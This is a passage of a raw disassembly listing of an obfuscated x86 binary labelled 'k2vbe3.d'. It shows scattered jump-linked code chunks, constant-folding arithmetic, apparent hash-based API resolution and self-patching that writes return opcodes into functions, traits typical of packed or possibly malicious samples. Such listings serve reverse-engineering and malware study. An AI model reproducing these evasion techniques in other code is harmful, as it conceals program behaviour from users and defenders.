		jnz	loc_454822
		jmp	loc_44D9FD
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_44E542	proc near		; CODE XREF: k2vbe3.d:00453251j
					; sub_454639+Ap

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043DBF8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447A47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A3AB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BBA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4C6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452B83 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045466F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457058 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	eax, ecx
		call	sub_45762D

loc_44E54D:				; CODE XREF: sub_454639-32FBj
		xor	edx, edi

loc_44E54F:				; CODE XREF: sub_454639:loc_45402Fj
		cmp	dword ptr [ebp-108h], 43776569h
		jnz	loc_454D1E
		jmp	loc_447E8B
sub_44E542	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44E564:				; CODE XREF: sub_44B912-4FEAj
		mov	ebx, ecx

loc_44E566:				; CODE XREF: sub_44B912:loc_456962j
		call	nullsub_13
		retn
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D244

loc_44E56C:				; CODE XREF: sub_43D244+7100j
		jmp	loc_43F3DC
; END OF FUNCTION CHUNK	FOR sub_43D244
; ---------------------------------------------------------------------------

loc_44E571:				; CODE XREF: k2vbe3.d:0043EC48j
		jmp	loc_4411AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44E577:				; CODE XREF: k2vbe3.d:004401D8j
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44E57C:				; CODE XREF: sub_45AD42-1D70Ej
					; sub_44B912-894j ...
		call	sub_457580

loc_44E581:				; CODE XREF: k2vbe3.d:00447CD6j
		jmp	loc_449F71
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_44E586:				; CODE XREF: sub_454463:loc_449CD9j
		call	sub_44471B

loc_44E58B:				; CODE XREF: k2vbe3.d:0044511Fj
		jmp	loc_45681A
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44E590:				; CODE XREF: sub_44C90E-2CC6j
		add	eax, ebp
		push	ebx
		call	sub_45A992

loc_44E598:				; CODE XREF: sub_45A992+16j
		jmp	loc_443311
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_44E59D	proc near		; DATA XREF: k2vbe3.d:0045A138o
		mov	eax, ds:dword_441210
		mov	eax, [eax]
		mov	ds:dword_441228, eax
		xor	eax, eax
		mov	ds:dword_441210, eax
sub_44E59D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_44E5B0:				; CODE XREF: sub_442DF0:loc_442F81j
					; sub_4588E6+Cj ...
		jnb	loc_4514F0
		jmp	loc_45039F
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_44E5BB:				; CODE XREF: sub_453AE8:loc_453AEEj
		jz	loc_44E4B2
		jmp	loc_45700D
; END OF FUNCTION CHUNK	FOR sub_453AE8

; =============== S U B	R O U T	I N E =======================================



sub_44E5C6	proc near		; DATA XREF: sub_45A323-A36Fo
		add	edi, ebp
		add	edi, 1193C28Fh
		mov	[edi], eax
		pop	edi
sub_44E5C6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_44E5D1:				; CODE XREF: sub_43EFDA+1AA74j
		call	nullsub_14
		jmp	loc_4599A0
; END OF FUNCTION CHUNK	FOR sub_43EFDA

; =============== S U B	R O U T	I N E =======================================



sub_44E5DB	proc near		; DATA XREF: sub_451222+89Fo

; FUNCTION CHUNK AT 00440D90 SIZE 00000014 BYTES

		push	12CF08h
		pop	esi
		rol	esi, 0Bh
		or	esi, 425FE92Ch
		xor	esi, 0D9A7054h
		jmp	loc_440D90
sub_44E5DB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAEB

loc_44E5F5:				; CODE XREF: sub_45AAEB:loc_446432j
		dec	dword ptr [ebp-18h]
		jnz	loc_45897F
		jmp	loc_44EB4C
; END OF FUNCTION CHUNK	FOR sub_45AAEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543B0

loc_44E603:				; CODE XREF: sub_4543B0:loc_44047Bj
		xchg	eax, [esp+0]
		jmp	sub_43DA01
; END OF FUNCTION CHUNK	FOR sub_4543B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_44E60B:				; CODE XREF: sub_44D2F1+AEA3j
		popf
		jns	loc_44FD5B
		adc	edx, eax

loc_44E614:				; CODE XREF: sub_44D2F1:loc_44ED50j
		call	sub_4436CE
		push	76C1B4A8h
		pop	edx
		jmp	loc_43CFAB
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_44E624:				; CODE XREF: k2vbe3.d:00444842j
		jnb	loc_444E4B
		ja	loc_44B4D8
		sbb	ebx, 93D29252h
		jmp	loc_440528
; ---------------------------------------------------------------------------

loc_44E63B:				; CODE XREF: k2vbe3.d:0043E5A9j
		jb	loc_44067F
		add	ebp, 1B4F348Dh

; =============== S U B	R O U T	I N E =======================================



sub_44E647	proc near		; CODE XREF: k2vbe3.d:0044AF71p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C452 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440D45 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004454D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562B7 SIZE 0000000E BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		push	0E57A24C4h
		jmp	loc_43C452
sub_44E647	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44E655:				; CODE XREF: sub_45A323:loc_43C049j
		pop	ebx
		cdq
		sub	eax, edi
		not	edx
		jmp	loc_44C9FA
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_44E660:				; CODE XREF: sub_44BDBB-8898j
		jz	loc_43CEFE
		jmp	loc_4595D2
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================



sub_44E66B	proc near		; DATA XREF: k2vbe3.d:0044732Ao
		xchg	edx, [esp+0]
		jmp	sub_4553CC
sub_44E66B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_44E673:				; CODE XREF: sub_44DD31-BE13j
					; sub_44DD31-BDFAj
		xor	edx, 317AE3CEh
		jns	loc_45B855

loc_44E67F:				; CODE XREF: sub_44C90E+C515j
		jmp	loc_45AE80
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_44E684:				; CODE XREF: sub_45B4A2-F1B5j
		jmp	loc_43C55D
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585F2

loc_44E689:				; CODE XREF: sub_4585F2-184CFj
		jmp	loc_447D20
; END OF FUNCTION CHUNK	FOR sub_4585F2
; ---------------------------------------------------------------------------
		adc	ecx, edx
		cmp	edi, 5D3D726Ah
		jmp	loc_45B842
; ---------------------------------------------------------------------------
		jno	loc_445126
		jmp	sub_443795
; ---------------------------------------------------------------------------

loc_44E6A6:				; CODE XREF: k2vbe3.d:loc_4518D3j
		pop	ebx
		sub	ebx, 0E5230F89h
		cmp	ebx, 0BC40141Eh
		jmp	loc_457E8C

; =============== S U B	R O U T	I N E =======================================



sub_44E6B8	proc near		; CODE XREF: sub_4479A1:loc_4464C1p
					; k2vbe3.d:0044D618j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045554F SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp-4+arg_0]
		push	offset loc_457E23
		jmp	loc_45554F
sub_44E6B8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_44E6C9:				; CODE XREF: sub_44B208:loc_457C50j
		jz	loc_440E5C
		jmp	loc_45127F
; END OF FUNCTION CHUNK	FOR sub_44B208
; ---------------------------------------------------------------------------
		test	ecx, ebx
		jmp	loc_44DF76
; ---------------------------------------------------------------------------

locret_44E6DB:				; CODE XREF: k2vbe3.d:loc_43E0E5j
		retn
; ---------------------------------------------------------------------------

loc_44E6DC:				; CODE XREF: k2vbe3.d:004454DCj
		jmp	sub_43C206
; ---------------------------------------------------------------------------

loc_44E6E1:				; DATA XREF: sub_44ADECo
		jz	loc_456392
		call	sub_43D66F

loc_44E6EC:				; CODE XREF: k2vbe3.d:0044E12Ej
		jmp	loc_458EE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44E6F1:				; CODE XREF: sub_440C94:loc_44BD27j
		jz	loc_44EF6B
		jmp	loc_442C39
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

loc_44E6FC:				; CODE XREF: k2vbe3.d:loc_45403Aj
					; k2vbe3.d:00454055j
		or	esi, 67294832h
		push	offset sub_44DFE5
		jmp	loc_458D1C
; ---------------------------------------------------------------------------

loc_44E70C:				; CODE XREF: k2vbe3.d:00456059j
					; DATA XREF: sub_451214-133FBo
		popf
		sub	eax, ebx
		pop	ebx
		ror	eax, 16h
		xor	eax, 0D12F1DA7h
		ror	eax, 11h
		jmp	loc_45264C
; ---------------------------------------------------------------------------

loc_44E721:				; CODE XREF: k2vbe3.d:loc_4515B4j
		jns	loc_454178
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44E727:				; CODE XREF: sub_43C3A9+1DDB2j
		jmp	loc_43ECC1
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_44E72C:				; CODE XREF: sub_4468FE+Aj
		jmp	loc_44A69D
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
		or	esi, 4393FEC3h
		pop	edx
		jmp	loc_454178
; ---------------------------------------------------------------------------
		mov	eax, 0F34E90C0h
		call	sub_4553CC
		push	edx
		push	0B170F3F5h
		pop	edx
		sub	edx, 0A5DF22DDh
		jmp	loc_4493D8
; ---------------------------------------------------------------------------

loc_44E759:				; CODE XREF: k2vbe3.d:0043C8ECj
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		mov	eax, edx
		push	edx
		push	76BD4D7Fh
		pop	edx
		sub	edx, 0DB49BB28h
		jmp	loc_444268
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44E773:				; CODE XREF: sub_442475+A53Ej
					; sub_442475:loc_451A2Ej
		mov	eax, [esp+0]
		push	edx
		sub	edx, ecx
		jmp	loc_445481
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44E77E:				; CODE XREF: sub_43DEBE:loc_456B5Dj
		jnz	loc_4500A2
		jmp	loc_44CA00
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44E789:				; CODE XREF: sub_44D0D5:loc_45464Dj
		push	esi
		pushf
		push	88E3C47Dh
		pop	esi
		add	esi, 798E6D07h
		jmp	loc_4463AE
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_44E79C:				; CODE XREF: k2vbe3.d:loc_4477A5j
		jz	loc_459983
		jmp	loc_43EF98
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_44E7A7:				; CODE XREF: sub_45AB7E+6j
		mov	eax, [esp-4+arg_0]
		push	edx
		push	eax
		push	78C242D5h
		sbb	eax, 0B2822860h
		jmp	loc_43E827
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------

loc_44E7BC:				; CODE XREF: k2vbe3.d:0044DEB3j
		jz	sub_45301F
		jmp	loc_4451EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_44E7C7:				; CODE XREF: sub_44A7C2:loc_442225j
		sbb	eax, edx
		cdq
		jmp	loc_447214
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44E7CF:				; CODE XREF: sub_44B999:loc_444E85j
					; sub_44B999+B60Bj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43EFE3
		jmp	loc_447572
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44E7E0:				; CODE XREF: sub_445124:loc_4493D8j
		rol	edx, 19h
		add	edx, 601D41B6h
		or	edx, 0D9956F72h
		add	edx, 268C71C2h
		jmp	loc_444ACC
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44E7FA:				; CODE XREF: sub_44D0D5:loc_43F833j
					; k2vbe3.d:0043F846j
		call	sub_44B3C0

loc_44E7FF:				; DATA XREF: sub_44DD31:loc_45B855o
		add	edx, 0F35ACBFDh
		xchg	edx, [esp+0]
		jmp	sub_44A7C2
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_44E80D:				; CODE XREF: k2vbe3.d:00458097j
		call	sub_44C1BD
		push	offset sub_4401FF
		jmp	loc_452A72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44E81C:				; CODE XREF: sub_44921C:loc_4415C4j
		jnz	loc_45319D
		jmp	loc_45820C
; END OF FUNCTION CHUNK	FOR sub_44921C

; =============== S U B	R O U T	I N E =======================================



sub_44E827	proc near		; DATA XREF: k2vbe3.d:loc_450BE4o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044EC04 SIZE 0000000A BYTES

		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		call	sub_447BE9
		mov	eax, 0DD1C4F2h
		jmp	loc_44EC04
sub_44E827	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AF0E

loc_44E83C:				; CODE XREF: sub_45AF0E+20j
		call	sub_4432B0
		mov	ds:dword_444F20, eax

loc_44E846:				; CODE XREF: k2vbe3.d:0044A95Dj
					; sub_45AF0E+Bj ...
		mov	eax, ds:dword_444F20
		call	sub_453347
		mov	esp, ebp
		pop	ebp
		jmp	loc_43C000
; END OF FUNCTION CHUNK	FOR sub_45AF0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44E858:				; CODE XREF: k2vbe3.d:00447766j
					; sub_44921C:loc_448C82j
		call	sub_44021B

loc_44E85D:				; DATA XREF: sub_456666:loc_44BBF5o
		add	eax, 0AF1F2F90h
		mov	eax, [eax]
		cmp	byte ptr [eax],	2Eh
		jnz	loc_45516F
		jmp	loc_4567F0
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_44E873:				; CODE XREF: k2vbe3.d:004433EBj
		mov	eax, [ebp-8]
		push	eax
		call	sub_43CC89
		push	0FF1AD96Bh
		pop	eax
		xor	eax, 6513D17Ah
		or	eax, 0F219141Ch
		and	eax, 0E13C12DEh
		jmp	loc_44925A
; ---------------------------------------------------------------------------

loc_44E899:				; CODE XREF: k2vbe3.d:00459089j
		jnz	loc_44BD58
		jmp	loc_44DBFD
; ---------------------------------------------------------------------------
		push	offset sub_454890
		jmp	locret_447DB1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_44E8AF:				; CODE XREF: sub_454E83+741Bj
		jmp	loc_45A78D
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44E8B4:				; CODE XREF: sub_4424CF-1DE9j
		jmp	loc_44CAA6
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44E8B9:				; CODE XREF: sub_4580DF-1AA75j
		jmp	loc_45B5E6
; END OF FUNCTION CHUNK	FOR sub_4580DF

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_44E8BE	proc near		; DATA XREF: k2vbe3.d:00449ECFo
		call	sub_4553CC
		call	sub_43CD53
sub_44E8BE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44E8C8:				; CODE XREF: sub_445124+125E0j
		jmp	loc_455056
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------

loc_44E8CD:				; CODE XREF: k2vbe3.d:00449ED4j
		jmp	locret_44A081
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_44E8D2:				; CODE XREF: sub_456C15-14089j
		jnz	loc_449625
		ror	ebx, 15h
		jmp	loc_43E546
; END OF FUNCTION CHUNK	FOR sub_456C15

; =============== S U B	R O U T	I N E =======================================



sub_44E8E0	proc near		; CODE XREF: k2vbe3.d:loc_444088j
					; DATA XREF: k2vbe3.d:loc_44DB33o

; FUNCTION CHUNK AT 00442100 SIZE 00000005 BYTES

		call	sub_44367E
		mov	eax, 726FC43Ah
		call	sub_4553CC
		mov	ds:off_41E0AC, eax
		lea	eax, sub_4583B8
		mov	byte ptr [eax],	0C3h
		jmp	loc_442100
sub_44E8E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E903	proc near		; CODE XREF: sub_410A9C+9Bp
					; sub_44E903:loc_44B38Fj
					; DATA XREF: ...

; FUNCTION CHUNK AT 0044B38F SIZE 00000006 BYTES

		call	sub_44B39A
		jmp	loc_44B38F
sub_44E903	endp


; =============== S U B	R O U T	I N E =======================================



sub_44E90D	proc near		; CODE XREF: sub_44B251:loc_447B83j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C365 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 004400D5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442CEC SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004445D3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004466C7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044796A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449A22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AB36 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C819 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DDFF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004515CE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454129 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454214 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CB2 SIZE 0000000A BYTES

		add	esp, 0FFFFFEF4h
		push	0FFh
		lea	eax, [ebp-10Ch]
		push	eax
		push	72E7EB05h
		pop	eax
		rol	eax, 13h
		jmp	loc_4466C7
sub_44E90D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44E92D:				; CODE XREF: sub_44D298:loc_442158j
					; k2vbe3.d:loc_44D7D7j
		push	offset sub_43EBC0
		jmp	nullsub_109
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_44E937:				; CODE XREF: sub_45101A:loc_447C96j
		jz	loc_443A7E
		jmp	loc_451A93
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
		mov	edx, edi
		and	edx, 0D29E6FE4h
		jmp	sub_44B7E2
; ---------------------------------------------------------------------------

loc_44E94F:				; CODE XREF: k2vbe3.d:loc_43F7FFj
		add	ebx, 88362E53h
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_45530F
		mov	byte ptr [eax],	0C3h
		jmp	sub_45530F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_44E966:				; CODE XREF: sub_45530Fj
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		jmp	loc_458E13
; END OF FUNCTION CHUNK	FOR sub_45530F

; =============== S U B	R O U T	I N E =======================================



sub_44E971	proc near		; DATA XREF: sub_44B94B-E93o

; FUNCTION CHUNK AT 0043D851 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444B8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446018 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B2FD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454E4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457A9C SIZE 0000000B BYTES

		call	sub_43CC89
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_43D851
		jmp	loc_454E4C
sub_44E971	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_44E985:				; CODE XREF: sub_4481FA:loc_452B3Bj
		jnz	loc_44ABF5
		jmp	loc_44B906
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_44E990:				; CODE XREF: sub_452CF7:loc_447D85j
		call	sub_4553CC
		mov	ds:dword_41E0C4, eax
		lea	eax, nullsub_15
		mov	byte ptr [eax],	0C3h
		jmp	loc_444610
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	ebx
		jmp	loc_44DC5A
; ---------------------------------------------------------------------------
		add	edx, esi
		test	eax, edx
		jmp	loc_457259
; ---------------------------------------------------------------------------
		push	offset sub_449A6E
		jmp	loc_45B873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_44E9C6:				; CODE XREF: sub_451CF1:loc_453D08j
		mov	eax, 276E7523h
		call	sub_4553CC
		mov	ds:off_41E174, eax
		lea	eax, loc_45B014
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B014
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
		add	esi, edi
		jmp	sub_444C8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_44E9EC:				; CODE XREF: sub_448D7F+7B91j
		jmp	loc_44D797
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_44E9F1:				; CODE XREF: sub_44D316-1058Cj
		jmp	loc_45131D
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------

loc_44E9F6:				; CODE XREF: k2vbe3.d:004560A2j
		ja	loc_44E30F
		or	ebx, 8ACD5FC3h

loc_44EA02:				; CODE XREF: k2vbe3.d:loc_43FCC9j
		call	sub_43E204
		retn
; ---------------------------------------------------------------------------

loc_44EA08:				; CODE XREF: k2vbe3.d:00450400j
		call	sub_43C04E
		test	al, al
		jmp	loc_4502B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_347. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44EA15:				; CODE XREF: k2vbe3.d:00453E50j
		jmp	locret_44A86D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_44EA1A:				; CODE XREF: sub_4440B5+3j
		jmp	loc_446447
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_44EA1F:				; CODE XREF: sub_45451C-11952j
		jmp	loc_4580C6
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------

locret_44EA24:				; CODE XREF: k2vbe3.d:00450CA5j
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44EA26:				; CODE XREF: k2vbe3.d:0044605Aj
		jmp	loc_45AD60
; ---------------------------------------------------------------------------

loc_44EA2B:				; CODE XREF: k2vbe3.d:0044D7C7j
		jnp	loc_44EDF1
		xchg	eax, [ebp+0]
		jmp	loc_45C058
; ---------------------------------------------------------------------------

loc_44EA39:				; CODE XREF: k2vbe3.d:loc_45547Aj
					; k2vbe3.d:00457CD4j
		push	23546C75h
		pop	eax
		add	eax, 403051D3h
		sub	eax, 3967C1A6h
		jns	loc_4439F3
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_44EA51:				; CODE XREF: sub_4534C2+12j
		jmp	loc_4509BC
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------

loc_44EA56:				; CODE XREF: k2vbe3.d:00452A8Cj
		jmp	loc_44171D
; ---------------------------------------------------------------------------

loc_44EA5B:				; CODE XREF: k2vbe3.d:0043E7D0j
		jmp	locret_4400AF
; ---------------------------------------------------------------------------
		xor	ecx, ebx
		jmp	loc_447CDB
; ---------------------------------------------------------------------------

loc_44EA67:				; CODE XREF: k2vbe3.d:loc_456221j
		jz	loc_43D056
		jmp	loc_452060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_44EA72:				; CODE XREF: sub_440D7B+10j
		pop	ebx
		push	91C4F6F2h
		pop	eax
		sub	eax, 810AF89Eh
		jnz	loc_45218F

loc_44EA85:				; CODE XREF: sub_44416D+152E2j
		jmp	loc_457B01
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44EA8A:				; CODE XREF: sub_44EEFE+1A76j
		jmp	loc_4514BD
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
		xor	ebp, edi
		jmp	loc_452189
; ---------------------------------------------------------------------------

loc_44EA96:				; CODE XREF: k2vbe3.d:00444A15j
		jo	loc_44441E
		xor	ecx, edx

loc_44EA9E:				; CODE XREF: k2vbe3.d:loc_452049j
		push	30C2B430h
		pop	eax
		rol	eax, 1Ch
		or	eax, 936C5F65h
		rol	eax, 1Fh
		cmp	eax, 0B8981C45h
		jmp	loc_44EBA0

; =============== S U B	R O U T	I N E =======================================



sub_44EABB	proc near		; CODE XREF: k2vbe3.d:0044B6BAj
					; sub_44F1C4:loc_45B2C4p

; FUNCTION CHUNK AT 0043E08D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044222A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457F98 SIZE 00000018 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	eax, 0FFFF5E77h
		push	ecx
		pushf
		push	6E183901h
		jmp	loc_457F98
sub_44EABB	endp

; ---------------------------------------------------------------------------
		pushf
		jmp	sub_440F1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44EAD7:				; CODE XREF: sub_44ED3C:loc_44DD4Ej
		add	edi, ebx
		pushf
		jmp	loc_4578F7
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_44EADF	proc near		; DATA XREF: k2vbe3.d:00442C18o
		add	ebx, 3420105h
		mov	[ebx], eax
		xchg	eax, [esp+0]
		mov	ebx, eax
		pop	eax
		jmp	loc_44B1FE
sub_44EADF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:off_41E094
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_44EAF8:				; CODE XREF: sub_45156D+6AD4j
		jmp	loc_452A31
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_44EAFD:				; CODE XREF: sub_43D31B:loc_44B1D3j
					; sub_43C3A9+1A37Dj ...
		pop	edx
		jb	loc_45A62C
		mov	eax, [esp+0]
		call	sub_44C74D

loc_44EB0C:				; CODE XREF: k2vbe3.d:0045AC91j
		jmp	sub_4518D8
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
		mov	edi, 0D4DC85D8h
		jmp	loc_44061F
; ---------------------------------------------------------------------------
